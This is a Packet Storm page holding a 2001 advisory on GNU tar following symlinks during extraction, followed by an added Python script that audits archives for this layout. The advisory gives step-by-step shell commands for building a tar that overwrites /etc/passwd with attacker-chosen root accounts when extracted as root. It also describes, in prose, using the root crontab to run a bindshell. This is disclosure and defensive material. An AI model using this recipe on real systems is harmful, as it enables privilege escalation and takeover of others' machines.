
tar-symlink.txt

08 Jan 2001 00:00:00 | Reported by Marco van Berkum | Type: packetstorm | packetstormsecurity.com

GNU tar program follows symlinks, risking system file overwrites during extraction as root.

Code
`Title : GNU tar (Tape ARchive) symlink vulnerability  
Author : Marco van Berkum  
Organisation : OBIT b.v.  
URL : http://www.obit.nl  
Email : [email protected]  
Date : 06-01-2001  
  
The useful program tar (Tape ARchive) is used by all UNIX, Linux and BSD  
versions around and is used to ARCHIVE files to disk or tape in an easy  
portable format.  
  
While this program has been used for a long time there seemed to be no  
need to fix the problem of following symlinks in an archive.  
The problem is that tar follows symlinks without questioning whether this  
is a file which is harmless or a file such as /etc/passwd.  
This way it will be possible to overwrite ANY file on the system when  
untarred as root (NOT DONE).  
  
How can this be done?  
  
Well, you create a directory as a test to see the effect of a tarred symlink  
  
% mkdir test  
% cd test  
% ln -s /etc/passwd passwd  
% ls -al  
total 2  
drwx--x--x 2 user user 1024 Aug 7 13:08 ./  
drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../  
lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd -> /etc/passwd  
%  
  
You now have a symlink to /etc/passwd, next we are going to tar this  
symlink.  
  
% tar -cvf test.tar *  
% ls -al  
total 12  
drwx--x--x 2 user user 1024 Aug 7 13:11 ./  
drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../  
lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd -> /etc/passwd  
-rw------- 1 user user 10240 Aug 7 13:11 test.tar  
%  
  
Let's see what's in the tarfile now  
  
% tar -tf test.tar  
passwd <- AHA a symlink ;)  
%  
  
This is not visible as a symlink when you do -tf !!  
It would be when doing tar -tvf (verbose).  
  
So next we remove the symlink from the test directory  
  
% rm passwd  
  
We now have only the tarfile with the symlink to /etc/passwd, next we  
create our own passwd file  
  
% echo "root:our_password_string:0:0::/root:/bin/bash" >passwd  
% echo "hax0r:our_password_string:1000:100::/tmp:/bin/bash" >>passwd  
  
OK, now we have a test.tar and a passwd file; all we would have to do is  
simply append the passwd file to the tarfile.  
  
% tar -rf test.tar passwd  
  
Now list it  
  
% tar -tf test.tar  
passwd <- AHA a symlink ;)  
passwd <- our evil passwdfile  
%  
  
Now one can imagine what happens when this tarfile is extracted as root:  
it will create a symlink to /etc/passwd and overwrite it with ours.  
Of course this is possible with all files on the system, one of the most  
malicious things to do would be overwriting the root crontab and executing  
commands that way.  
Even programs like bindshell can be executed this way by making a symlink  
to say /tmp, dump the bindshell binary/source to /tmp and make a  
root crontab pointing to that file by executing or compiling and executing  
it, which will leave us with a rootshell ;)  
  
Solution:  
  
Well, obviously one should NEVER untar files as root, but a patch to  
the tar program which enhances tar by asking whether it should follow  
symlinks or not would do the trick as well.  
  
grtz,  
Marco van Berkum  
--  
Sex is like hacking. You get in, you get out,  
and you hope you didn't leave something behind  
that can be traced back to you.  
  
Marco van Berkum, System Operator/Security Analyst OBIT b.v.  
RIPEHANDLE: MB17300-RIPE  
  
  
`
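
A pre-extraction check for the archive layout described in the advisory, written with Python's standard `tarfile` module. This is an added example, not part of the original advisory or of GNU tar; the names `audit_tar` and `build_sample` are hypothetical, and the sample archive is constructed in memory. It reads member headers only, extracts nothing, and flags symlinks that point outside the extraction directory as well as any later member that reuses or sits below an earlier symlink's name.

```python
import io
import posixpath
import tarfile

def audit_tar(fileobj):
    """Return (member_name, reason) findings for a tar stream, without extracting."""
    findings = []
    links = {}  # normalised symlink member name -> its target, in archive order
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for m in tar:
            name = posixpath.normpath(m.name)
            parts = name.split("/")
            # A later member that reuses, or sits below, an earlier symlink's
            # name is the layout the advisory builds: flag it conservatively.
            for i in range(1, len(parts) + 1):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    findings.append((m.name, f"written through symlink {prefix} -> {links[prefix]}"))
                    break
            if m.issym():
                target = m.linkname
                resolved = posixpath.normpath(posixpath.join(posixpath.dirname(name), target))
                if posixpath.isabs(target) or resolved == ".." or resolved.startswith("../"):
                    findings.append((m.name, f"symlink escapes extraction dir -> {target}"))
                links[name] = target
    return findings

def build_sample():
    """Constructed sample: symlink 'passwd' followed by a regular file 'passwd'."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("passwd")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/passwd"
        tar.addfile(link)
        data = b"constructed placeholder contents\n"
        reg = tarfile.TarInfo("passwd")
        reg.size = len(data)
        tar.addfile(reg, io.BytesIO(data))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    for name, reason in audit_tar(build_sample()):
        print(f"{name}: {reason}")
```

An empty result means neither pattern was found; any finding is a reason to extract as an unprivileged user into a scratch directory, or not at all.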
